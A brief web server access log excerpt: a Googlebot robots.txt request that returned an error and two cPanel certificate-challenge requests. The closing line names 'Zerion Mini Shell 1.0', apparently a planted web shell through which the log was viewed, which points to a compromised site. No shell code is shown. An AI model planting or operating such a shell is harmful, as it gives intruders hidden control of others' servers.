66.249.77.1 - - [04/Dec/2025:20:21:52 +1100] "GET /robots.txt HTTP/1.1" 500 678 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.143.88.233 - - [04/Dec/2025:22:22:19 +1100] "GET /.well-known/acme-challenge/B9YEM5FP1Y-WHZSEL7316CY84SDR6VHT HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"
203.143.88.233 - - [04/Dec/2025:22:22:20 +1100] "GET /.well-known/acme-challenge/MDMJVILB93TKCNX5SQ4I0WIH3DEIAKQF HTTP/1.1" 200 64 "-" "Cpanel-HTTP-Client/1.0"

Zerion Mini Shell 1.0